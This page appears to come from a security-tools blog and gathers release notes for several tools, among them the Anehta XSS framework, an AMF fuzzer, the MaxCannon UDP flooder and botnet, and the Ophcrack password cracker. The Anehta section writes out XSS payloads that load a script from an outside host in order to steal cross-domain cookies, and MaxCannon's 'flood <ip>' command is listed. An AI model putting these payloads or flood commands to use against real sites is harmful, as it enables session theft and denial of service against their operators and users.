Anehta V-0.6 released.

Anehta is a web application tool for security audits.

 

=== Environment ===
1. PHP4/5 (PHP5 is recommended)
2. Apache or IIS
=== Install & Configure ===
1. Decompress all the files into a directory on your server.
2. Make sure the directory has write permission.
3. Set $U to the username and $P to the password in the “server/class/auth_Class.php” file.
Default username is “admin” and default password is “123456”.
4. If you want to send mail, modify “server/mail.php” file to your own mail server or mailbox.
=== Quick Start ===
1. Log in and go to the Configure tab.
2. Set “anehtaurl” to the URL where your Anehta installation is located.
For example: “http://www.a.com/anehta”.
3. You should also set the boomerang src and boomerang target.
boomerang src is usually the page where you put your feed.js.
For example, boomerang src may be: “http://www.b.com/xssed.html?param=<script src=http://www.a.com/anehta/feed.js></script>”.

boomerang target must be the page from which you want to steal the cross-domain cookie.
For example, boomerang target may be: “http://www.alimafia.com/xssDemo.html#’><script src=http://www.a.com/anehta/feed.js></script><‘”.

You can modify feed.js to disable the xcookie module if you do not want to use boomerang.
However, you must always set the boomerang src and target values when you change settings in the Configure tab.

4. After modifying the configuration, simply load feed.js as an external script in your XSS page.
There is also a demo page in the directory, named “demo.html”.

5. Refresh admin.php, and you may see some changes if your XSS slave has come in.

Download in here | Read more right here

 


Blazer v-02 released : AMF Testing Made Easy!

Blazer is a custom AMF message generator with fuzzing capabilities, developed as a Burp Suite plugin. It is designed and implemented to make AMF testing easy, while still allowing researchers to fully control the entire security testing process.


Using Blazer, testing AMF-based applications is easier and more robust. As it is highly integrated in a well-known testing suite, web security practitioners can start to use the tool with minimal setup in a few seconds.
Blazer implements a new testing approach, introduced at Black Hat USA 2012. This automated gray-box testing technique allows security researchers to improve the coverage and the effectiveness of fuzzing efforts targeting complex applications.

For further details, please refer to the original whitepaper and presentation.
Features

  • Automatic Java objects generation from method signatures via Java reflection and “best-fit” heuristics
  • Fuzzing capabilities, with customizable data pools and attack vectors
  • Ability to start, pause, restore and stop testing
  • Easy-to-use internal methods to construct custom AMF messages
  • Embedded BeanShell for manual testing
  • Highly integrated in Burp Suite
  • Support for Java server-side remoting technologies (Adobe BlazeDS, Adobe LiveCycle Data Services, GraniteDS, …)

Blazer has been developed in Java as a Burp Suite plugin and released under the GNU General Public License. Burp plugins are supported by both versions (free and professional) of the Burp Suite. All major operating systems (Windows, Mac, Linux) with standard Oracle JRE installed are supported by Blazer.

Download In here | Read more right here

MaxCannon

MaxCannon is a UDP Denial of Service stress tester with a twist. The tool also allows your computer to become a server for a volunteer botnet, where other people with MaxCannon can connect and are under the command of the server operator. The clients that connect to this volunteer botnet can join and leave any time they want.


Commands: The two commands available to the server operator are

flood <ip>
connected (shows who is connected)

Features

  • UDP Flood (DoS)
  • UDP Flood (DDoS) With Volunteer Botnet
  • Simple to Use
  • Volunteer Botnet
  • Powerful
  • Simple UI

Download in here | read more right here

crtdbg4wince – Debugger Analysis and Memory Penetration test tool

Are you looking for _CrtDumpMemoryLeaks(), _CrtSetReportMode() and all the well-known Win32 stuff, but can’t find it for your Windows CE or Windows Mobile native C or C++ development? Tired of memory leaks? Handle leaks? Trouble with Appverify (Application Verifier for WinCE)? Stop searching. Congratulations, you got it!

It was generated standalone (without running debugger in background) 

Features

  • finds leaks in C or C++ code
  • shows the file and line of the leaked object
  • jumps the cursor to the file and line when you click an entry in the report

This tool is for debugger analysis and memory penetration testing.


Download Latest Version : crtdbg4wince_source.zip (142.9 kB) 

Read more here: http://sourceforge.net/projects/crtdbg4wince

Update: Ophcrack 3.4.0 (Time-Memory-Trade-Off-Crack)

Ophcrack is a Windows password cracker based on a time-memory trade-off using rainbow tables. This is a new variant of Hellman’s original trade-off, with better performance. It recovers 99.9% of alphanumeric passwords in seconds.


Features :

  • Cracks LM and NTLM Windows hashes
  • Free tables available for Windows XP, Vista and 7
  • Brute-force module for simple passwords
  • Audit mode and CSV export
  • Real-time graphs to analyze the passwords
  • LiveCD available to simplify the cracking
  • Loads hashes from encrypted SAM recovered from a Windows partition

Download Latest Version:
Windows: ophcrack-win32-installer-3.4.0.exe (5.9 MB)
Unix/Linux: ophcrack-3.4.0.tar.bz2 (279.8 kB)
For installation and other versions, please read here:
http://sourceforge.net/projects/ophcrack/files/ophcrack/3.4.0/

swet (sustained workload & efficiency test)

swet (sustained workload & efficiency test) is a portable benchmark for POSIX and BSD operating systems with multi-thread and multi-process capabilities and flexible, powerful report options.


Features  :

  • Uniform performance/efficiency unit across platforms
  • multi-process (daemon) capability
  • multi-thread capability
  • nanosecond / microsecond precision option
  • flexible detail selection
  • floating-point tests
  • integer tests
  • math / logic / bitwise / branch tests
  • 8-, 16-, 32-, 64-, and 128-bit tests
  • flexible test class selection
  • test sets definable by list and/or range
  • test sets may be read from file or as command-line argument
  • flexible output formatting – CSV / HTML / Framed-Table

Recent Release Notes 1.4.57 Stable 24 Apr 2012: This release includes integer-64 bits, and floating-point-64 and -128 bits basic arithmetic tests.

Download Latest version : http://sourceforge.net/projects/swet/files/
Read more in here : http://swet.sourceforge.net/

Coding for Penetration Testers

What sets a good penetration tester apart from an average one is the ability to adapt to the ever-changing landscape within which we live. One aspect of this adaptability is the skill to build, extend, and manipulate scripts and applications encountered in the field. Whether tools already exist to accomplish a task, or one needs to be built to take advantage of a new vulnerability, the ability to build and extend tools in a variety of scripting languages is important. Each of the first five chapters of this resource delves into a different scripting language that we may encounter while performing penetration tests.

Through investigating the core aspects of each language, either on Microsoft platforms, or on Linux platforms such as BackTrack 5, each chapter brings to light the power and strengths of each language. We will use these strengths to build a series of scripts to help us understand the intricacies of each language, and in most cases develop a basic tool that we can use and extend while penetration testing. Whether it is through shell scripting, Python, Perl, Ruby, or PHP, we will cover the basics of each language and discuss topics such as output handling, loops and control statements, networking, and command execution.

Once the core language concepts have been covered, Coding for Penetration Testers tackles the core tasks of penetration testing. While covering scanner scripting and information gathering, we will discuss tools such as Nmap and Nessus and use the scripting languages behind them to extend the capabilities of both tools. Information gathering is one of the first and most important steps of a penetration test. We don’t know what we’re attacking until we do the initial research. Chapter 8 investigates how to automate information gathering tasks to be more effective and to have repeatable results.

Once we’ve gathered the information, we’re ready to begin the offensive. Through looking at Python as an exploit delivery tool, we will discuss the basics of exploit development. Walking through building a working exploit, Chapter 9 takes us through each step of the process, from creating a Proof of Concept (POC) to creating a repeatable and extendable exploit within the Metasploit Framework.
The following descriptions provide an overview of the contents of each chapter:

  • Chapter 1: Introduction to command shell scripting
  • Chapter 2: Introduction to Python
  • Chapter 3: Introduction to Perl
  • Chapter 4: Introduction to Ruby
  • Chapter 5: Introduction to Web scripting with PHP
  • Chapter 6: Manipulating Windows with PowerShell
  • Chapter 7: Scanner scripting
  • Chapter 8: Information gathering
  • Chapter 9: Exploitation scripting
  • Chapter 10: Post-Exploitation scripting

Read More In Here